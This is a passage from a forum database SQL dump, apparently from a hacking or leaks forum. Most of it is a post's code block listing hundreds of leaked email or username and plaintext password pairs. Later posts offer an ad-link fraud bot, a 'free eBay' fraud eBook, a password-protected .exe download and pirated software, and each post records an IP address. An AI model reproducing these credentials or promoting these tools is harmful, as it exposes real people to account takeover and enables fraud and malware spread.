53:paperclip\r\npuremist666:21232123\r\njohnfnc:24862486\r\n15sniper:disneyworld\r\nmolomolo96:colonial\r\n99wcprod:poopy1\r\nwalkcastle3:nones\r\nsaatie:nissan350z\r\ncentvind1:hummer1\r\njaskin1992:ambrose\r\nKraizey89:password89\r\nBubs28:parents\r\nkofifan:michigan1\r\npancakes975:pompom\r\nHellkidr:danny15\r\nfrankof doom:chamberlain\r\nCrouchingkey:donuts\r\nrewhiss:987987\r\nMagekillu420:crack\r\nmiguelwale:dogdog\r\nplat325:123098\r\nshrimpykillr:beasty1\r\nmr veyron:decade\r\nHeunill:oneill\r\ntet 14:baseball94\r\nkillgos13:andrew11\r\nsportmachien:joey123\r\ntylerzorich@yahoo.com:boomer1\r\nrhettisawesome@hotmail.com:campbell\r\npinkrubberducky@live.com:skipper\r\nvitodebe@hotmail.com:123qweasd\r\nthesnomann@hotmail.com:cheesecake\r\nleo.silva44@gmail.com:weapon\r\n--------------------------------------------------------\r\nfreestuffploxlol@aol.com:fenner\r\nkstbitter@aol.com:kitkat\r\nruddlisa@aol.com:brandon\r\njoeylivengood7@aol.com:10101994\r\nchijy025@aol.com:marshall\r\nmplunkett@hotmail.co.uk:gypsy\r\nDragonz1995@aol.com:warlock\r\nkoekje807@gmail.com:appeltje\r\nelias_sorensen@hotmail.com:elias\r\njacobthomas96@hotmail.com:jaydub\r\nsnowdude_123@hotmail.com:dooley\r\naz_buzzin1998@hotmail.com:viola\r\nsuckmy50cal@gmail.com:giselle\r\nhaydiggity@hotmail.com:donuts\r\nHot_wheel22@yahoo.com:19091997\r\nthe_man_195@yahoo.com:window\r\nxshaadow@hotmail.com:azsxdc\r\nRobertmarcellino@hotmail.com:normaal\r\nboyke93@hotmail.com:figther\r\nrsthebest@go2.pl:freeze\r\nbrian_groothuizen@hotmail.com:duffie\r\ndjl220@yahoo.com:laptop\r\njackrasta@hotmail.com:pillow\r\npitsapoiss_kristo@hotmail.com:emane\r\nyorick_alas_91@hotmail.com:counter\r\nhazza.taylor@hotmail.com:hazard\r\nandrew.alan@rocketmail.com:farts\r\nalven3115@yahoo.com:marissa\r\nangelmoroco@hotmail.com:toshiba\r\nrjsofly@att.net:122394\r\nsweet_skilz6@yahoo.com:rennes\r\nmoraslan@yahoo.com:pencil\r\najit1002@hotmail.com:acmilan\r\njoseph97@windstream.net:gower\r\njes_mar123@hotmail.com:a1b2c3d4\r\nKhanshak9@hotmail.com:lollipop\r\nLil_j_wall@yahoo.com:bigdaddy\r\nmatt_16_trance@hotmail.com:fabregas\r\ngbf_coca@hotmail.com:powers\r\nlilshortdude2@hotmail.co.uk:frenchfries\r\ndjdempsey300@hotmail.co.uk:popcorns\r\nscottie210@hotmail.com:summer02\r\nknakenlol@gmail.com:handdoek\r\nnahom_1993@hotmail.com:132456\r\nrmwaha@gmail.com:legend\r\nrunescaper8107@aol.com:stimpy\r\ncallumbeaney@hotmail.co.uk:special\r\ncs_vege@hotmail.com:qwerty12\r\ntobias.b@live.nl:billen\r\nkobecomputer@hotmail.com:volgende\r\nstijntje_wittekop@hotmail.com:danger\r\nneffendeule@hotmail.com:normaal\r\nHandwizzard01@yahoo.com:dalton\r\ncrazyman76@yahoo.com:music\r\ncrogzz@hotmail.com:traitor\r\nolivercraker@aim.com:miner\r\ndamontillis@yahoo.com:showtime\r\nmsearch@hotmail.com:control\r\nChris33baseball@yahoo.com:burger\r\njbk4201111@yahoo.com:modesto\r\nfray043@bellsouth.net:12101\r\nlarslnde@gmail.com:redded\r\nsc4red@hotmail.com:snickers\r\njosh_gabba01@hotmail.com:finger\r\nAlexander_2008@hotmail.co.uk:danger\r\nkarlososeggleston@googlemail.com:power1\r\nstudent.david@live.be:vandorpe\r\nDArmymn@aol.com:kansas\r\nemo.socker@live.no:johanne\r\njackmahon@msn.com:haymaker\r\nkwldude101@aol.com:poler\r\nkarelpiirimaa@hotmail.com:fenestra\r\nyoda80020@yahoo.com:justinm\r\nbrandonpeters1@hotmail.com:flintoff\r\nmarremarcus@live.se:alfons\r\njordydragon_vegter@hotmail.com:forsale\r\nJamesTheB3ast@yahoo.com:julia2\r\nmusti_Alby@hotmail.com:145145\r\ndanielturbohot@hotmail.com:262262\r\nsimpson123@hotmail.com:soleil\r\nsuperjade12@aol.com:georgina\r\nsoccerp1guy@yahoo.com:titties\r\nbuddaboy519@gmail.com:awesome\r\nelectro.leader@hotmail.com:tunnel\r\npeypey26@hotmail.com:27012\r\nswfcladz@gmail.com:thumper\r\nemail2email@juno.com:acclaim\r\nlilnate_47@yahoo.com:minime\r\njack-pidge@sky.com:harrys\r\nSandik94@inbox.lv:marsis\r\nproneaccident@hotmail.com:chewy\r\norpalmer@hotmail.com:doberman\r\ngabtheaverage@gmail.com:123abc\r\ndakesbaked@aol.com:issues\r\nBmacker101@hotmail.com:helpme\r\ngrim364_99@yahoo.com:brown\r\nthealvinater@hotmail.com:black1\r\nzac.turner@hotmail.com:staples\r\nPuxi.96@hotmail.com:Jerusalem\r\nrunescapemon1@yahoo.com:trevo\r\nlukas.sablinskas@gmail.com:lukas\r\nieudaesbkn@hotmail.com:mierda\r\nsasuke22789@aol.com:11051996\r\ncor-verboor@live.nl:ricardo1\r\nlinkbean@yahoo.com:ocarina\r\njonis94@hotmail.com:paladin\r\nskeetyz@yahoo.co.uk:bullseye\r\ndmsagh@yahoo.com:qazwsx1\r\nwatty963@hotmail.co.uk:020396\r\ndashboard98@hotmail.com:chimney\r\nsamproesmans@hotmail.com:kiken\r\nmesswiththegod@hotmail.com:hilal\r\nminimee_@hotmail.co.uk:banner\r\nohgeenohp@gmail.com:jayjay\r\nisithaz@hotmail.fr:okokok\r\ndexwizard@ymail.com:pegasus\r\nhrach@cross.am:genius\r\nnguyenbrianphi@yahoo.com:blader\r\nmatthew_pipe@hotmail.com:cocoon\r\nbubscanfly@aim.com:parents\r\nalasdairbeggs@btinternet.com:random\r\nbilgicmustafa@hotmail.com:301092\r\naraeronautics@yahoo.com:trophies\r\nWildcat10138@msn.com:snackbar\r\nmarkj97@comcast.net:hackers\r\njonsey-hfc@hotmail.co.uk:hibernian\r\nwalkerhunter40@yahoo.com:racecar\r\nbugsbunny1927@hotmail.com:holden\r\ndavid_A_JR@live.com:nonono\r\ntvmaster9595@yahoo.com:alacran\r\ndanny_d4nny2008@yahoo.com:dummie\r\nxtguysrule@yahoo.com:kinney\r\njoshjameskidd@Hotmail.com:windmill\r\nturners_2_fast@hotmail.com:staples\r\naelric72@yahoo.com:runner\r\n------------------------------------...98@hotmail.com:everest\r\ngirlmagnet75@yahoo.com:064524\r\nbisavasic@hotmail.com:hallo123\r\neminemman200@yahoo.com:purestr\r\nbrentalancampbell@yahoo.com:apple1\r\ngfrohman2@yahoo.com:wagner\r\ngoldendefense@yahoo.com:chitty\r\nshoelessginger@live.com:mahasa\r\nkylepalodichuk@yahoo.com:allen1\r\nJasperfarmer@live.com:Jazzband\r\ncapri.93@live.com:adc123\r\nbinhnguyenphoung@yahoo.com:912127\r\nmich118@hotmail.co.uk:dragon99\r\nseb-12345678@hotmail.com:1234rewq\r\nSamspigt@hotmail.com:ownednoob\r\nyogassa@hotmail.com:ameland\r\nluke_walsh_1998@hotmail.com:killerdude12345\r\nsmgchico23@yahoo.com:jasmine23\r\nstan_groenen@hotmail.com:donald11\r\ntotozor5@hotmail.fr:002255\r\ns-c.p@live.com:wonders\r\ntemka100@yahoo.com:canadarules\r\nfrogprints10@yahoo.com:11caralane\r\ncuvie@hotmail.com:autoplay\r\nsifu_magic@yahoo.com:redred\r\nkylefguy@hotmail.co.uk:1234qwer\r\nbowdsters@hotmail.ca:helpyou\r\nstevenvhal@hotmail.com:1q2w3e4r5t\r\ntehnick@hotmail.co.uk:chahal\r\nSemertuz@hotmail.com:19944991\r\nhunterhelpme@yahoo.com:redred\r\nbrandonraymartin@yahoo.com:brandon321\r\nradiowns@yahoo.com:noobster\r\nmichealjc123@yahoo.co.uk:cassie101\r\njames_cos97@hotmail.com:cossie\r\nm.rendon1995@yahoo.com:killer99\r\nnoahfarrington11@hotmail.com:printer\r\nollie.mate@yahoo.com:nitro13\r\nlukechambers101@hotmail.co.uk:thug4life\r\nsoapface8@hotmail.com:lolnoob\r\nNuclearwasteland@yahoo.com:idontcare\r\nijaazmgp@hotmail.com:stronger\r\ntobias.b@live.nl:billen\r\nd-d-k@hotmail.com:packard1\r\nmarksdabest@hotmail.com:haha123\r\ncappe_clan@hotmail.com:grovsnus\r\njaret_stub@hotmail.com:812035\r\naustincprs@yahoo.com:therock\r\ntricellmovies@yahoo.com:vincent1\r\nfilipo2000@hotmail.com:131100\r\nmatthew_pipe@hotmail.com:cocoon\r\nfr0z0ne0wnz@hotmail.com:selling\r\nmineoit@hotmail.com:p0k3m0n\r\nbellodarren@yahoo.com:pimpin1\r\nrileygarff@live.com:guitar1\r\nhenrik_nicander@hotmail.com:276017\r\nreece_moyse@yahoo.com.au:razberry\r\nn_oo_dles@hotmail.com:321boom\r\nspamfrodo@yahoo.com:billyboy\r\nsports_kid07@yahoo.com:carpenter\r\nh_m_g_b0i@hotmail.com:loveher\r\niglooownedme@hotmail.com:nico13\r\nisithaz@hotmail.fr:okokok\r\ni_ziyadeh@yahoo.com:404040\r\nante0586@hotmail.com:Deskjet\r\nmattrulz33@hotmail.com:billabong\r\njohnny1995@live.com:471735\r\nrandallewalker@yahoo.com:usuck12\r\ndragonx566@yahoo.com:278566\r\nJesse_n_@hotmail.com:290596\r\nkundingerlink@yahoo.com:159753852456\r\nrileysorley@hotmail.com:1q2w3e4r5\r\nmerchant.69@hotmail.com:honker\r\nrainrebane@hotmail.com:ghbghb\r\njaska1997@hotmail.com:assa123\r\nb.hw@hotmail.com:ajacied\r\nmalikisballer@yahoo.com:neopets\r\nalexanderkroll44@yahoo.com:crapper\r\nrhys1000@live.co.uk:dalton1\r\nmewesley64@hotmail.com:cat3rpillar\r\njustinstalter96@yahoo.com:pieisgood\r\nbiigtomzz@hotmail.com:granddad\r\nirwingroen@hotmail.com:ronaldinho\r\ntimmmettje@hotmail.com:jens123\r\nx1void1x@yahoo.com:1211995\r\nbadguy_im_high@hotmail.com:nukezone\r\njolyjamesiscool@hotmail.co.uk:daddy1\r\nblue.skies.please@hotmail.com:different123\r\nfdebaggis4@yahoo.com:ghillie\r\nscooterant123@hotmail.com:clay123\r\ntato408:lawrence\r\ncaramelknuckle:santa1\r\ntdlleader@hotmail.com:247746\r\ndarkvallhalla@hotmail.com:Twinkle007\r\nsanji265@hotmail.com:zamorakdream\r\nkevin_everhardus@hotmail.com:cu6b9rfz\r\nflatcoatmix@gmail.com:lilanna\r\njoey_versluis@hotmail.com:kwamtuns\r\nbenziller@optonline.net:godziller\r\nsquirrleyalso@hotmail.com:funnyface\r\nandyb0i@live.com:pirates1\r\nperry.clan@hotmail.com:hillside\r\ncutie1925@hotmail.com:ultimate\r\nccccccjkkjqqxx123@yahoo.com:dead123\r\naustenhowe2010@hotmail.com:momdad\r\nmungaryaustin@yahoo.com:975311\r\nelliottgh@hotmail.co.uk:220194\r\nelliottgh@hotmail.co.uk:220194\r\nccccccjkkjqqxx123@yahoo.com:dead123\r\nteo.braxen@hotmail.com:123abc\r\nsam_cradd@yahoo.com:cicero\r\nryanz2010@hotmail.co.uk:sdsdsd\r\ndeathis@hotmail.co.nz:happyson\r\naustenhowe2010@hotmail.com:momdad\r\nvladi1995@hotmail.com:nogomet\r\niamir22@live.ca:cleric\r\neat-it006@hotmail.com:leanna\r\nkurtismobsters@hotmail.com:sianna\r\ndaniellelovesyouh@hotmail.com.au:sadness\r\nm.linden@live.se:kalleanka\r\nkvammegeir96@hotmail.com:hereiam1\r\neat-it006@hotmail.com:leanna\r\nmichaelgrissom8732@yahoo.com:police1\r\nzslicendice3@hotmail.com:m0nk3y\r\nstrmoneypure19@yahoo.com:camaro13\r\nisaiah-is-cool@hotmail.com:power1\r\nhellfire2508@hotmail.com:707036\r\nthe_lanky_kid@hotmail.com:zaffino\r\nhellfire2508@hotmail.com:707036\r\nj0hnnyb0y999@yahoo.com:13243546\r\nrochtov@hotmail.com:charizard\r\ndevinhodges33@yahoo.com:2468642\r\nlets.rock2009@hotmail.com:ablett\r\nspill-gutt1@hotmail.com:dell12\r\nanisa147@hotmail.co.uk:211484\r\nj0hnnyb0y999@yahoo.com:13243546\r\nperok2010@hotmail.com:vuurwerk\r\nisaiah-is-cool@hotmail.com:power1\r\nthe_lanky_kid@hotmail.com:zaffino\r\nxp_nihp@hotmail.com:moldova\r\netgoshert@yahoo.com:boners\r\njfcouper@yahoo.com:armageddon\r\njakegrayson15@yahoo.co.uk:merseyside\r\nCarbonite123@hotmail.com:123123321\r\ntormentedchewy304@yahoo.com:thebeast\r\njordon-_-n@hotmail.com:1234561\r\nmuio22@yahoo.com:123434\r\nunlineacc@hotmail.com:964070\r\ntchen0908@gmail.com:19950908\r\njakegrayson15@yahoo.co.uk:merseyside\r\nfacun_acevedo@hotmail.com:1020304050\r\nm.linden@live.se:kalleanka\r\nwrjrocks09@yahoo.com:brenda\r\nalejolopez@live.com:841963\r\npettan00@hotmail.com:julmust\r\nXsUseeIseesX@hotmail.ca:bonjovi12\r\nnumbvengance@yahoo.com:138825\r\niPhilliip_@hotmail.com:phillip1\r\nrspsownage@live.com:boldface\r\nxiceflakesx@hotmail.com:062123\r\nrochtov@hotmail.com:charizard\r\nncaten@yahoo.com:flipflip\r\nmarkbel2011@hotmail.com:187372\r\nb_chemuel@hotmail.com:flatron\r\nchristopher0065@hotmail.com:7852406\r\nrens18@hotmail.com:poep23\r\ntraevannman@hotmail.com:wweraw\r\nconner.catlow@live.com:conner1\r\nj.wharton@hotmail.com:gibbons1\r\nbrandon.robinson1494@yahoo.com:naganomaru\r\nwalkwithswag1@hotmail.com:123qweasd\r\nininja65@yahoo.com:ninjas\r\nstewart@live.co.uk:979780\r\ncaneble@hotmail.com:poleman\r\nr.kryvenchuk@yahoo.com:12345t\r\nspeedy_2148@yahoo.com:hockey1\r\ndamian.126@live.com:nofear\r\ntylerstill39@yahoo.com:bamafan1\r\nsil3ntturtl3@yahoo.com:fishyboy\r\nmdgonyon@yahoo.com:123four\r\ntylerzorich@yahoo.com:boomer1\r\naBuuuuuZe@live.co.uk:poppycat\r\n---------------------------------------------------------\r\nsomewhere1996@yahoo.com:fredfred\r\nsonicspeed25@hotmail.com:antonio\r\nownage110001@hotmail.com:pooface\r\nparlorDDBB@aol.com:therock1\r\npodfafa@yahoo.com:chidori\r\nontherightside@hotmail.com:falcon\r\naliraheel99@live.co.uk:capslock\r\nkris100@hotmail.no:kris12\r\naliraheel99@live.co.uk:capslock\r\nwale415@yahoo.com:dogdog\r\nkhris.ranger@hotmail.com:charizard\r\nrange30033@hotmail.co.uk:198912\r\nz121qrcg@msn.com:colombia\r\ntrucks_alex@hotmail.com:scania\r\nontherightside@hotmail.com:falcon\r\nrock_dog100@hotmail.com:dalton\r\nhecklerryan@yahoo.com:heckler1\r\nlumpjack@gmail.com:pizza5\r\ntaterjon69@yahoo.com:asshole12\r\nsam-j-r74@hotmail.co.uk:scruffie\r\nv.kash12@gmail.com:master12\r\nmarshallfan94@Yahoo.com:baseball94\r\nGiasson3@hotmail.com:killbill\r\nhellboy_23592@hotmail.com:nicolas1\r\nmenno_gjaltema@hotmail.com:destination\r\nwvogler11@aol.com:chase1\r\nyounglightning235@gmail.com:yondaime\r\nmatt1027@comcast.net:sadie1\r\nmarc9999@comcast.net:hotdog123\r\nthebug310@aol.com:alexander1\r\nflyboy9991@hotmail.com:racecar\r\ntbrixius89@gmail.com:thumper1\r\nmr.makka.pakka@hotmail.com:password123\r\nrimssat22@yahoo.com:walter\r\nkiabadragon@aol.com:skater7\r\niggyggy@hotmail.com:iglesias\r\nzerohcontrol@gmail.com:westwood\r\nunhallowed@hot.ee:heroes\r\nmchz41@gmail.com:100295\r\nfelix@overbeck-hansen.dk:hansen\r\nlalakid3@yahoo.com:crappy\r\nbigben@warp.nfld.net:eyeliner\r\nbriancapxd@hotmail.com:critical\r\ncrazymothatrucker@ymail.com:killzone\r\nKevQSweet@yahoo.com:steelers\r\nbd123100@aol.com:shotgun\r\nmarshalmelow@hotmail.com:losers\r\nadam.mcclements@googlemail.com:adam123\r\n1234kidze16:tr1st1an\r\nQ Cry Q:when8606\r\nOwnedamated:we3kings\r\nstynkyy:yello321\r\nboodarocks:steelers\r\nDcc4:dmccmd\r\nJason123x:blazers\r\nAotta:ThisIsMyPassword\r\nF2pker inc:jason1\r\nDar_Ko:a11009041a\r\nauraky1:ky135792\r\nLi Gh T Side:chase123\r\nk1lla_tick:lindros\r\nthe jon8:dude676\r\n3 second k0:spearow1\r\nSworddude03:de3vin\r\nWhorsy:15012266639\r\nfredx105:fred101\r\n1a9n9t2h:tetjuvefr7\r\nDerivate You:fisherj1019\r\nexcalllibur:fielding1\r\nvazire:manson\r\nZealot Mania:241287\r\nv achillies:pimpz4\r\nHustlin Fluf:taproot12\r\nAva Defil3d:awsome\r\nDarkness9820:akshay7912\r\ngeddon233:meowface\r\nDdorda:302383510\r\nAerial Bacon:fishdude\r\nExpert 4im:7251994\r\ntravis8_8:ihave3cats\r\nflattman:harrah12\r\ndrakgon180:flare\r\nTheGeVirgin:HighFive\r\nfakewaterwalker:armageddon\r\nZeas666:dahliastraat\r\nSolid Kirby:Denmarkis1337\r\nHierofalcon:jehuty\r\nChuckeh:riona88\r\nEpic Eric:xcap0x\r\nstikk6:kat57\r\nsqrlwizard:nordman98\r\nSteveGates11:k9killer\r\nPalad1n X1:troublem\r\nTahnycakes:rtkgifts\r\ngji456:madison\r\nIpk888:stopit12\r\nxlxy:fr0sty\r\nThe Joqer:coolusa21\r\nCrunk Carl:dcpr1c3r\r\nAlchenoid:socky\r\nboozer_pk:boozer\r\nAn_arc_e:langishm4rt\r\nfishhead190:kong69\r\nRuneman X8:666abc\r\nPure Charges:bergelis\r\nLemons Merch:6897342\r\nsrankie1994:qweeasw1\r\nWeed Mob:o1202573033\r\n0bby mail:baadshah\r\n-----------------------------------------------------\r\nnicky206@hotmail.com:southpark\r\nadde_star_94@hotmail.com:kawasaki\r\nc.arnison@btinternet.com:chrisa\r\nspyrochriz@yahoo.com:buffalo\r\nldkay@eastlink.ca:dingdong\r\nonly1redheadedangel@yahoo.com:precious\r\nalecvanderlinden@live.nl:laptop\r\nlordarmel@gmail.com:bowser \r\njohn.smith.13333@gmail.com:chinas upo here=-086475222222222222222222222\r\njonnyboy1993@hotmail.com:hamilton\r\nboyjman@live.com.au:whitton\r\nwhako10@yahoo.com:heydude\r\ngurbax25@hotmail.com:navjot\r\nflamin_james@hotmail.co.uk:chinky\r\nnathanmounlasy@yahoo.com:billion\r\nthetommy123@yahoo.com:mikaela\r\ntdk_shadowlail@yahoo.com:killgore\r\ntooth_pic@live.com:slamdunk\r\ngarrett3650@yahoo.com:killop\r\nsimonatkins1@blueyonder.co.uk:240593\r\ntwpix1@hotmail.com:badman\r\nasscorona@gmail.com:sweeney\r\nnagydomonkos@citromail.hu:domokos\r\ncodyswhitworth@hotmail.com:dalek\r\ntony-u12bme@hotmail.co.uk:shithead\r\njoku-96@hotmail.com:aleksi\r\nrunezacho@yahoo.dk:bertram\r\nspamfrodo@yahoo.com:billyboy\r\nwishxdagger@gmail.com:camille\r\ngreeny_had_s3x@hotmail.com:empire\r\nbyers.neil@hotmail.com:sausages\r\ntheworstsite@hotmail.com:jonny\r\npthypervxkenpachi@hotmail.com:10011998\r\nrosiu_cool@yahoo.com:06281996\r\ndeath_011@hotmail.com:router\r\nchickensx68@GMAIL.COM:skillz\r\nkol55655@hotmail.com:kolton\r\nkflipgsk8s@aol.com:121193\r\nra777500@yahoo.com:anderson\r\nsophiewantsyou@hotmail.co.uk:chahal\r\nbenweekly@gmail.com:mankind\r\njoey.causey@yahoo.com:454545\r\ndaxslayer5@yahoo.com:red123\r\ndomicooke@hotmail.co.uk:huckle\r\nacidrocker_@hotmail.com:lolita\r\ncococlassic44@aol.com:masters\r\ndrumgun@live.com.au:knights\r\nmoniar7@hotmail.com:newguy\r\nkiddpaul808@gmail.com:sayson\r\nvalencia.760@hotmail.com:ramon\r\njohn011293@hotmail.co.uk:minime\r\nlilr0cker9@yahoo.com:billyk\r\npkislife@gmail.com:warren\r\ncjohn046@yahoo.com:johnjohn\r\nsnorrie@live.com:norrie\r\nskate-kyle@hotmail.com:awesome\r\nultimatecos21@yahoo.com:21031990\r\nforan7@bigpond.com:byebye\r\nrossythecoming@live.com:daisyo\r\nvolcomskater1357@yahoo.com:hotshot\r\nbalindabriggs@yahoo.com:nicolas2\r\nbernwuzhere24@gmail.com:bernie\r\nerestrepo08@hotmail.com:clayton\r\ngusler94@gmail.com:alcatraz\r\naapjekoen@hotmail.com:banjer\r\nblaydys@gmail.com:10081995\r\njustintran21@hotmail.com:tocome\r\nNathanflol@live.com:forgot\r\nragzzy4life@gmail.com:strength\r\nkorsan_freack@hotmail.com:merhaba\r\nblancoaziel@yahoo.com:luiggi\r\nfcknudde25@hotmail.com:farrari\r\nbd123100@aol.com:shotgun\r\njarobertson91@yahoo.com:10201991\r\nclement_ster@hotmail.com:16641664\r\nricardo_boynight@hotmail.com:110989\r\nrowandeschaux@hotmail.com:frikandel\r\ndonothaveanicecream@hotmail.com:samsam\r\njake25denges@yahoo.com:pissoff\r\ncody_833@hotmail.com:02131997\r\njack_g_unit69@hotmail.com:25802580\r\nltct@hotmail.co.uk:tiger1\r\nandrewcarswell97@yahoo.com:909909\r\nBrianRoberts54321@Gmail.com:deerslayer\r\nmasesalcido@yahoo.com:258456\r\njari_inthehuis@hotmail.com:boesen\r\njoe.grice@tiscali.co.uk:millie\r\nkingboy123drake@yahoo.com:william\r\nmoocity1234@gmail.com:082195\r\nkratos708@aol.com:mohammed\r\nblackxninja@rocketmail.com:cooler\r\nkifibra_igor@hotmail.com:250396\r\n------------------------------------...65@hotmail.com:zamorakdream\r\nant1_am3r1can_T3ch_sn1p3r@hotmail.com:philips\r\nmr_moochoo123@hotmail.com:bluecheese\r\nchstrackrebel@aol.com:barrier\r\njoey_versluis@hotmail.com:kwamtuns\r\ntwllol@hotmail.com:qunyu71\r\ncurtis_hewson@hotmail.com:469713\r\nbenziller@optonline.net:godziller\r\nfatalspin:kn15966901\r\n5k richer:endlessonline\r\nsteelerz 94:lacky\r\nwhyurunbch:nejinted\r\ndaniel525@hotmail.co.uk:dandan\r\ndanielsyme@hotmail.com:windows\r\nchrisc303@yahoo.com:garbage\r\ncalluml_24@live.com:twister\r\npaulvorobyev@gmail.com:winwin\r\njlyankee@comcast.net:cat123\r\nmrxechno@hotmail.com:hongkong\r\nmoultondustin@hotmail.com:snoots\r\nthesaltonater@gmail.com:frankie\r\nimanoob4life2010@hotmail.com:almost\r\nstufonoob@aol.com:sunset\r\nihatetheman2@yahoo.com:polos\r\nralphie8r@yahoo.com:freebird\r\ndevinincorp@yahoo.com:brock\r\nkoltenakr@yahoo.com:kolten\r\neay-its-me@hotmail.com:huisman\r\nomfglights0ff@aol.com:comet\r\njacoterry@yahoo.com:050594\r\nGREENLIZERD@HOTMAIL.COM:auriga\r\nDbacksplaya008@aim.com:hooters\r\ns_x_cjake@hotmail.com:bigtits\r\njam.on_toast@hotmail.com:lansing\r\nsabzeman@gmail.com:mehrdad\r\nnick_space_rocks@hotmail.com:bigred\r\ndylaniscool56@aim.com:tapes\r\nkazukixx@hotmail.com:spiker\r\nPipB316:robvandam\r\nhover509:nelysk\r\nLalrian:starrain\r\na_htje:ah1995\r\nammerson3:binkie1\r\nambbie:amber6\r\n[/code][/spoiler]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e132172d5a05587e619f7f776759ae81', '0', '0'); INSERT INTO mybb_posts VALUES('2053', '441', '0', '61', 'Adf.ly Bot + Adfoc.us Bot', '0', '82', 'iTzIpod', '1347712953', '[color=#FF0000][size=large]Hey guys, I\'m leaking another program![/size][/color]\n\n[color=#FF4500]This is a really simple to use! Check it out.[/color]\n\nWorks with [b]Adf.ly[/b] links and [b]Adfoc.us[/b] links!\n\n[color=#FF4500][size=large][b]ScreenShots:[/b][/size][/color]\n\n[img]http://img706.imageshack.us/img706/480/adflybot.png[/img]\n\n[color=#FF1493][b]Proof :[/b][/color] [img]http://img69.imageshack.us/img69/4334/58c0cba72724492d8b90e18.png[/img]\n\n[url=https://www.virustotal.com/file/af40b97913f588202d60633d61a51cf1658858d146e147364008f521b7bd812c/analysis/]Virus Scan [Click Here][/url]\n\n[mod]Download Link Removed! -Staff[/mod]\n\n[b][color=#FF1493]Remember!\nIf you enjoyed this please don\'t forget to post a thanks![/color][/b]', '24.212.197.164', '416597412', '1', '0', '1', '1347939100', '1', 'e2d6e187ba02880fe1705aebb7da5bec', '0', '1347939100'); INSERT INTO mybb_posts VALUES('2054', '442', '0', '42', 'Giant Solar Flare set to hit Earth in 2013', '0', '82', 'iTzIpod', '1347713327', 'A huge solar flare is expected to hit Earth in 2013, the peak of the 11 year solar flare cycle. Experts are saying this could be close to as big or bigger than the 1859 solar flare that knocked out all telegraph communications for months in some areas.\r\n\r\n[quote]They fear a huge solar flare is due to erupt in 2013 — causing blackouts and global chaos.\r\nThe once-in-a-century disaster could see power grids crash, communication systems collapse, planes grounded, food supplies hit and the internet shut down.\r\nEverything from home freezers to car sat navs would be affected.\r\nThe disaster could mirror the Great Solar Flare of 1859.\r\n\r\n\r\nRead more: http://www.thesun.co.uk/sol/homepage/news/3145874/Solar-flare-to-paralyse-Earth-in-2013.html#ixzz25q74kcz4\r\n[/quote]\r\n\r\nArticles to check out if interested:\r\nhttp://www.thesun.co.uk/sol/homepage/news/3145874/Solar-flare-to-paralyse-Earth-in-2013.html\r\nhttp://www.space.com/12586-solar-storms-intensity-2013-peak-nasa.html\r\n\r\n\r\n[b][i]Are we really better off now than we were before technology?[/i][/b]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b99b97fbcc8101918add70ab3e068bb9', '0', '0'); INSERT INTO mybb_posts VALUES('2055', '443', '0', '42', 'Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347713405', '[i]A couple days ago at Apple\'s iPhone 5 Event the company finally lifted the lid on its new smartphone. The device is officially called the iPhone 5 (despite being the 6th iPhone from the Cupertino company). The device looks just like the previously leaked image, with a slightly taller screen. Apple is referring to the device as \"the most beautiful product we\'ve ever made.\"\r\n\r\nThe iPhone 5 is made entirely of glass and aluminum and is the thinnest and lightest iPhone yet - it\'s 18% thinner and 20% lighter than the iPhone 4S. Apple is calling it \"The world\'s thinnest smartphone.\"\r\n\r\n[img]http://oyster.ignimgs.com/wordpress/stg.ign.com/2012/09/Screen-shot-2012-09-12-at-11.56.38-AM.png[/img]\r\n\r\n[color=#FF0000]Read the full article HERE:[/color] http://www.ign.com/articles/2012/09/12/apple-announces-iphone-5[/i]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e2f035ac142bf3d629c2b56803e38864', '0', '0'); INSERT INTO mybb_posts VALUES('2056', '444', '0', '61', '[eBook] How to get stuff on eBay for Free', '0', '82', 'iTzIpod', '1347713716', 'Hello. Today I\'m leaking an awesome eBook that will let you get anything on eBay for free!\r\n\r\nThis method works 100% for any product worth any price!\r\n\r\n\r\nHere is the link:\r\nhttp://www.mediafire.com/view/?rz7xwsthpd01brg\r\nEnjoy!\r\nPlease post a thanks! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f6144760797c68c417bfa0fe7b339d2', '0', '0'); INSERT INTO mybb_posts VALUES('2057', '445', '0', '61', '[eBook] Adf.ly Money Making Machine', '0', '82', 'iTzIpod', '1347713946', 'Download link - http://www.mediafire.com/view/?&2ef3quo2tb8k5ye\r\nPassword - .exe\r\n\r\nEnjoy! :D\r\n\r\nDon\'t forget to post a thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc078a88f5f3facb9c2e2bcabddbe7ba', '0', '0'); INSERT INTO mybb_posts VALUES('2058', '446', '0', '28', 'This forum is dead..', '0', '82', 'iTzIpod', '1347716846', '-_-\r\nWhy is it dead.\r\nLets try to bring it back to life?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c157233fdf27a2ee29c8e1ee244e231', '0', '0'); INSERT INTO mybb_posts VALUES('2059', '383', '1967', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '82', 'iTzIpod', '1347717208', '[quote=\'sirchamp\' pid=\'1967\' dateline=\'1347653342\']\r\nAsking for rep is forbidden. LQ ..\r\n[/quote]\r\n\r\n@KENNERZ, point proven. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'be13fc885a7acdda41806693266aa388', '0', '0'); INSERT INTO mybb_posts VALUES('2060', '436', '1998', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347717297', '[quote=\'t3h jok3r\' pid=\'1998\' dateline=\'1347676779\']\r\nI think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home.\r\n[/quote]\r\n\r\nYeah. If only summer was 3 months, we could\'ve had our members active a little longer.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd96f32e91889b019f5356be447d81ecc', '0', '0'); INSERT INTO mybb_posts VALUES('2061', '425', '1939', '61', 'RE: Huge SEing Giveaway [50+]', '0', '82', 'iTzIpod', '1347717416', 'Don\'t worry. It\'s safe...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '151a7599ad79e87496bf2cb5b5ef2ec1', '0', '0'); INSERT INTO mybb_posts VALUES('2062', '427', '1941', '61', 'RE: Photoshop CS6 Extended 64 Bit', '0', '82', 'iTzIpod', '1347717463', 'No problem.\nThis is for the people that want CS6 I guess.', '24.212.197.164', '416597412', '1', '0', 